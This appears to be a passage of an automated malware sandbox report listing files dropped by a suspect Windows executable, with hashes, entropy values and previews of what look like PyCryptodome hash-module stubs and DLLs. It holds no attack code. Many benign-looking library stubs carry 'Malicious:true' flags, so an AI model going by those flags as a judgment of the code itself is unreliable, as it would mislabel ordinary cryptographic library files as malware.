                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA224a..... int SHA224_init(void **shaState);. int SHA224_destroy(void *shaState);. int SHA224_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA224_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA224_copy(const void *src, void *dst);.. int SHA224_pbkdf2_hmac_assist(const void *inner,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):563
                                                                                                                                            Entropy (8bit):4.8974516866478135
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA224Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA224Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA224Hash: .......def new(data: Optional[Buffer] = ...) -> SHA224Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7972
                                                                                                                                            Entropy (8bit):5.225850552859429
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):630
                                                                                                                                            Entropy (8bit):4.955837939042722
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional......class SHA256Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> None: ..... def update(self, data: Union[bytes, bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA256Hash: ..... def new(self, data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......def new(data: Optional[Union[bytes, bytearray, memoryview]]=None) -> SHA256Hash: .......digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7972
                                                                                                                                            Entropy (8bit):5.226790353908028
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d.d...Z.e.j.........Z.e.j.........Z.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Cryptodome.Hash._SHA384a..... int SHA384_init(void **shaState);. int SHA384_destroy(void *shaState);. int SHA384_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA384_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA384_copy(const void *src, void *dst);.. int SHA384_pbkdf2_hmac_assist(const void *inner,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):563
                                                                                                                                            Entropy (8bit):4.911661278122058
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA384Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self, data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA384Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA384Hash: .......def new(data: Optional[Buffer] = ...) -> SHA384Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7093
                                                                                                                                            Entropy (8bit):5.36228005407194
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.e.j.........Z.d.Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................D.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.S.)...SHA3_224_Hashz.A SHA3-224 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string.. :ivar digest_size: the size in bytes of the resulting hash. :vartype digest_size: integer. .....z.2.16.840.1.101.3.4.2.7....c..........................|.|._.........d.|._.........d.|._.........t.........................}.t...........j.........|.....................................t...........|.j.........d.z.................t...........d.............................}.|.r.t...........d.|.z............
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.938042917334959
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_224_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_224_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_224_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_224_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_224_Hash: .......digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7093
                                                                                                                                            Entropy (8bit):5.367180156715783
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................z.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.e.j.........Z.d.Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptr..c_ubyte)..._raw_keccak_libc.....................D.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.S.)...SHA3_256_Hashz.A SHA3-256 hash object.. Do not instantiate directly.. Use the :func:`new` function... :ivar oid: ASN.1 Object ID. :vartype oid: string.. :ivar digest_size: the size in bytes of the resulting hash. :vartype digest_size: integer. . ...z.2.16.840.1.101.3.4.2.8....c..........................|.|._.........d.|._.........d.|._.........t.........................}.t...........j.........|.....................................t...........|.j.........d.z.................t...........d.............................}.|.r.t...........d.|.z............
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.9540685583606
                                                                                                                                            Encrypted:false
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_256_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_256_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_256_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_256_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_256_Hash: .......digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7311
                                                                                                                                            Entropy (8bit):5.344312071663393
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:98ykvye5Tj+Nupd36H0NtAYkjw7Q8OAOs6oO3puEpizb6lTISfZwQMnYDi9:9LCtAJw/OAAoOZ7izeC4ZwQMYDi9
                                                                                                                                            MD5:8C210C3A734F7F89784395E0651413A0
                                                                                                                                            SHA1:E633DC4B1896CACD542D6718418FA3BE93E77222
                                                                                                                                            SHA-256:6D497FD8D30A670586DA4FB8A944337D0585135CD7E1DE9DFE8F64CF994CD983
                                                                                                                                            SHA-512:D39E099A8BD9243DE92642ACABF87FE2AA14F6491471350CAF673953091E35966AA2E46C16DD844D4999F781507F4EF8C01972FA3CCE3226FE1DF6BB6E6D73C9
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.938042917334959
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3KHRypRyLXFL1AGRT7wDA5ULgRkhDGaLBCs4Ry5Ryn:1REcT32QEXFRAcVzkhqaLB6wy
                                                                                                                                            MD5:A889F6824941567ADFBD97E736E360AA
                                                                                                                                            SHA1:1C23C5A1FFB1F8D288974D55CE3C5AD2E6DD51BC
                                                                                                                                            SHA-256:D328A5327C257ACA3516C7C11B617D30D5E0C7C9915A32F4C6B3DDFE269DCF7F
                                                                                                                                            SHA-512:9CCF01936F3174D2EF90CC3B50631282F115D8BF952F4EA2AA4A2F7701C613D9A84DD9FAFB014F01689DDD938E22D258A071DADEBAE83A8376ECEDC6D11279A3
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_384_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_384_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_384_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_384_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_384_Hash: .......digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7096
                                                                                                                                            Entropy (8bit):5.367811756785092
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:U78ykvcDde5WO+O7pd36H0stDYkjT7QsOYOs6TO3pPbV0BoISfxwQMnYoe:s/AAtDJT/OYATOZq54xwQMYoe
                                                                                                                                            MD5:4F24BC57BD8F2B1F597353E12B825306
                                                                                                                                            SHA1:8C7865E40EEBB9DC0D67C812B4B86655FC0265D4
                                                                                                                                            SHA-256:455C68BFE8FBC2823DCEA19027F52E6B20A6508BAC97F7480DA46A3AFA72BDF2
                                                                                                                                            SHA-512:E814184004A11150F2D29DEFEE8F982C6848B9053EFC1FF425DF5772A34690A7B909CFE9852EB61A1ECB92F25AC079D883CF7C924366ECC8AB8B4A81B64D98D7
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):624
                                                                                                                                            Entropy (8bit):4.9540685583606
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY36WHRypRyLXFL1AGRT7wPWA5AWLgRkhPWGaLBCYW4Ry5Ryn:1REcT36WxQEXFRAcuWAGWmkhPWGaLBVF
                                                                                                                                            MD5:8356FEEC109E4373A23F69FC01C115B5
                                                                                                                                            SHA1:9825E1FC90E13C9A265835684C57B22C92BD372C
                                                                                                                                            SHA-256:5699B054358A0C556096C132C09C8B3052E5EFE815A26EDABC5AD5E896BF8E9C
                                                                                                                                            SHA-512:F9612E9C137858ECC00F2F6CB2E6564CEE149A8ED978B5552FA6CD1E89061BF395B37A92351ECB594F0D47ADD925BB53DBC573654A523CEE4E2F2D2789AAE2E5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA3_512_Hash(object):.. digest_size: int.. block_size: int.. oid: str.. def __init__(self, data: Optional[Buffer], update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> SHA3_512_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA3_512_Hash: ..... def new(self, data: Optional[Buffer]) -> SHA3_512_Hash: .......def new(__data: Buffer = ..., update_after_digest: bool = ...) -> SHA3_512_Hash: .......digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8785
                                                                                                                                            Entropy (8bit):5.283965682084965
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:aNqykvjOwpRrToqHwEd5u6Zc9cwp3HqfnklNT2yOs6kLjOVFyFJddddt+yGGmNj7:aNgOERvoqWf0knSyAkHO3rErh4
                                                                                                                                            MD5:D1A98429989448AFD7119764DB66082B
                                                                                                                                            SHA1:2B001135ADD05F4918033EF2002B4C51998B7568
                                                                                                                                            SHA-256:A49D580E090318F5816E44F300EC2C7CD6D31E367C26D3F1037A46EEDE929B41
                                                                                                                                            SHA-512:68D1AA646C76461DEA79E3CD04A57C931793E6E8FAD760CFBC3B05622CB714F2F559D0B86D1C9FD36C1A035ECB80823E7704EB3616CF88C9219FD85C73DBF44C
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):644
                                                                                                                                            Entropy (8bit):4.856785452609936
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3eRypRyLu1ApJREVwu5YgR4vORNJt0Ry5Ryn:1REcT3OQEWA1EnTcUNYwy
                                                                                                                                            MD5:B3762738614E6E1B46387BD0F80C1608
                                                                                                                                            SHA1:99293AED186FBBBF4D26C3E3A9198F2969596722
                                                                                                                                            SHA-256:BB0E0DF4F3FFFB4A2B9EFE5B674D7407BBD248678B0BF2A44FF0AA07D247DBDA
                                                                                                                                            SHA-512:E3B64DDF98F09B098B52AB79D69AF3827A483E4EDA33200B91F87BEB7E37E434D9CB75170635AE509F69D7F328F6B0A9ED258E42410265CE10B263B118C4521A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHA512Hash(object):.. digest_size: int.. block_size: int.. oid: str.... def __init__(self,.. data: Optional[Buffer],.... truncate: Optional[str]) -> None: ..... def update(self, data: Buffer) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def copy(self) -> SHA512Hash: ..... def new(self, data: Optional[Buffer] = ...) -> SHA512Hash: .......def new(data: Optional[Buffer] = ...,.. truncate: Optional[str] = ...) -> SHA512Hash: .....digest_size: int..block_size: int..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):450
                                                                                                                                            Entropy (8bit):4.960253129735369
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3wHVXFL1ApJR4QwEh72CX5BgR48OR42:1REcT36XFRA1Nh71m7U1
                                                                                                                                            MD5:1D2E126B0EA263236F02A5B62DA5903D
                                                                                                                                            SHA1:BCA2F2DC2A69380180FFEACDB276A6CA7FFD2036
                                                                                                                                            SHA-256:FCF71DFFB424435A46138D3B0377F30E1DB2AA318600D6DAE7B123DF848D3EA2
                                                                                                                                            SHA-512:4B806AABF25A8D9A705E282EB11EE73500BC1CF71A6EBE59A35A732DE1F5CA0D960BAC124059EF85AF9A6E5A2023895D7CDB195A884A8161275D9BE237F0A518
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE128_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE128_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE128_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE128_XOF: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):450
                                                                                                                                            Entropy (8bit):4.960253129735369
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB3vIY3gHVXFL1ApJR4QwIh72CX5BgR4gOR4K:1REcT3g1XFRA1Rh71m/UZ
                                                                                                                                            MD5:7A030ACE3463C718EAA115B061D5E0CE
                                                                                                                                            SHA1:0525426CE1A9ABE207F53E953EA8E272E423D512
                                                                                                                                            SHA-256:5FF0C2256DD9F35EB7BF58D07EDC5A27E73173221079006B1AF95D0B114863A4
                                                                                                                                            SHA-512:230109D6EAC483A3DFA0E268477D860AF0DB445D89EF5E39B32A9833CC85E8FBD610C88993CABB097A60630620539191A6AC9742DAD3A7FA141600C7AC4603D5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class SHAKE256_XOF(object):.. oid: str.. def __init__(self,.. data: Optional[Buffer] = ...) -> None: ..... def update(self, data: Buffer) -> SHAKE256_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer] = ...) -> SHAKE256_XOF: .......def new(data: Optional[Buffer] = ...) -> SHAKE256_XOF: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):688
                                                                                                                                            Entropy (8bit):4.533807558794474
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBzRo8seUvIY39cHRyD1AQ0dWRFwiOtC5J3r3/V039WgtcP33/RM33dWgtW:1REEyNT39oIAvdWtrj/VGif/qns
                                                                                                                                            MD5:19A89FFFB5E19D2A439870AA97B56DF2
                                                                                                                                            SHA1:32377BCB0660A03F28324C68EF03E94D0239A1DD
                                                                                                                                            SHA-256:B5671E5E8FC4513C2E0C9F072C1A9C868656F0CD66783DC011FC4556C1BD2306
                                                                                                                                            SHA-512:466932A02E76056468E12E1984DD3EA0DE44A3544DEA95F19723BE2EBBD9887D177AB7B3F75BAAA74E74D154C396DA468AA8F5492917599154EAEF04F3546B19
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any, Union, List, Tuple..from types import ModuleType....Buffer = Union[bytes, bytearray, memoryview]....class TupleHash(object):.. digest_size: int.. def __init__(self,.... custom: bytes,.. cshake: ModuleType,.. digest_size: int) -> None: ..... def update(self, *data: Buffer) -> TupleHash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,... digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .......def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):149
                                                                                                                                            Entropy (8bit):4.609062935971047
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1Lx7/NULQk8xNovSyrzcAiwZJysFTMCAW6wWfFKRiZJyFrIftZMFySJINfFDy:1Lx7/NULQXNoFrzcAx3ysRMhwWfsRi3s
                                                                                                                                            MD5:0C079EDD19DA6729069C7098599200CD
                                                                                                                                            SHA1:31985EE067F54DFCA6F334621CA9018D2A61DA15
                                                                                                                                            SHA-256:0B014A808207E4C2A6375DFD6ADE40C97B5802C8F9EA76748F333C1386C6704C
                                                                                                                                            SHA-512:5DFC7A622B54993F74F2848B595FDFCB33B63E43EDE31D384D4A635B179030EFC1222545607C8B816B90AC6FB273B8937B135F42B95AEB08AB906CF899027EB4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from .TupleHash128 import TupleHash....def new(digest_bytes: int = ...,... digest_bits: int = ...,.. custom: int = ...) -> TupleHash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):591
                                                                                                                                            Entropy (8bit):5.065116097079714
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBlRE1B9YplvIY39fIL1AzvQ1aEeEWmodFwIiRh72CX5BgRE3GH1dmF:1REOC1bClT39fIRAqYi6LiRh71mEc1dA
                                                                                                                                            MD5:B0223AB14FDA42D6811F55259F9BE663
                                                                                                                                            SHA1:409E32782D3A86B66CEBABFA703D72BD682C069A
                                                                                                                                            SHA-256:B7617049D0B2131180EA0B73AE8CAC73839A27D394BE6B4D9796F9D0198DE6B7
                                                                                                                                            SHA-512:4A1180FD51BFE2A50EB344A19EFB954C5071218C169F14AC7A86D72BC45B946A35E7CDC4A06E616A20948F235D501AD24B113F2B9ABF56D68F4100F0C2DE8410
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import TypedDict, Unpack, NotRequired....Buffer = Union[bytes, bytearray, memoryview]....class TurboSHAKE(object):.... def __init__(self, capacity: int, domain_separation: int, data: Union[Buffer, None]) -> None: ..... def update(self, data: Buffer) -> TurboSHAKE : ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer]=None) -> TurboSHAKE: .......class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):318
                                                                                                                                            Entropy (8bit):5.138819601387305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXa4REsuB9cebopy1LxyJQmUUzrIY3MT7O3ymK95lvdgzSNFIF:1REYBXa4RE1B9YSsumtvIY3eH1dmF
                                                                                                                                            MD5:0F8CE87AD72ECACADED5EB6869C0C063
                                                                                                                                            SHA1:4C8EBDA5C1826749B747BF268036DC11A1FD9CC3
                                                                                                                                            SHA-256:86DEA501F8ED56BAE7652415243B38845AB1C94A1E4AD0E737A98A37A80235EA
                                                                                                                                            SHA-512:8CD3AF34C3FD94E6DBE15575BB3AC6C84AFBAF14067066E53EEE3A727866C5E626E323C6ED4736186E21056D4A27EF57184DFAE378A9B8E53210F340051649ED
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union..from typing_extensions import TypedDict, Unpack, NotRequired....from .TurboSHAKE128 import TurboSHAKE....Buffer = Union[bytes, bytearray, memoryview]....class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14848
                                                                                                                                            Entropy (8bit):5.213290591994899
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:oF/1nb2mhQtkRySMfJ2ycxFzShJD9dAal2QDeJKcqgQx2QY:C2fKRQB2j8JD4fJagQx2QY
                                                                                                                                            MD5:7D6979D69CD34652D5A3A197300AB65C
                                                                                                                                            SHA1:E9C7EF62B7042B3BAC75B002851C41EFEEE343CE
                                                                                                                                            SHA-256:2365B7C2AF8BBAC3844B7BEF47D5C49C234A159234A153515EB0634EEC0557CC
                                                                                                                                            SHA-512:CBDBE0DF4F6CB6796D54969B0EEF06C0CDA86FF34A2B127BF0272C819FB224D6E5393D5C9B31E53A24EAC9A3A1AEA6E0854A8D7911CF7C4C99292C931B8B05DF
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14336
                                                                                                                                            Entropy (8bit):5.181893965844124
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:cF/1nb2mhQt7fSOp/CJPvADQoKtxSOvbcqgEvcM+:22fNKOZWPIDMxVlgEvL
                                                                                                                                            MD5:C3BA97B2D8FFFDB05F514807C48CABB2
                                                                                                                                            SHA1:7BC7FBDE6A372E5813491BBD538FD49C0A1B7C26
                                                                                                                                            SHA-256:4F78E61B376151CA2D0856D2E59976670F5145FBABAB1EEC9B2A3B5BEBB4EEF6
                                                                                                                                            SHA-512:57C1A62D956D8C6834B7BA81C2D125A40BF466E833922AE3759CF2C1017F8CAF29F4502A5A0BCBC95D74639D86BAF20F0335A45F961CFCAC39B4ED81E318F4EB
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14336
                                                                                                                                            Entropy (8bit):5.1399121410532445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:HsiHXqpo0cUp8XnUp8XjEQnlDtTI6rcqgcx2:J6DcUp8XUp8AclDy69gcx2
                                                                                                                                            MD5:BB4CF5E97D4031B47CC7B7DAEDA005DD
                                                                                                                                            SHA1:4F596DCE9A8546AE22BA8851B22FCE62C2C69973
                                                                                                                                            SHA-256:325512FF7E0261AF1DA4760C5A8BB8BA7BA8C532F0068D770621CD2CC89E04C6
                                                                                                                                            SHA-512:93088745BA922918A8EBC20C7043DA4C3C639245547BE665D15625B7F808EC0BF120841ACEEFCE71134921EF8379821769DE35D32CCCC55E6B391C57C7F4D971
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.204576067987685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:JsiHXqpwUiv6wPf+4WVrd1DFrXqwWwcqgfvE:36biio2Pd1DFrlgfvE
                                                                                                                                            MD5:D2131380B7760D5BC3C2E1772C747830
                                                                                                                                            SHA1:DA5838E1C6DF5EC45AC0963E98761E9188A064D0
                                                                                                                                            SHA-256:6DB786B30F6682CD699E22D0B06B873071DCC569557B6EB6EC1416689C0890FE
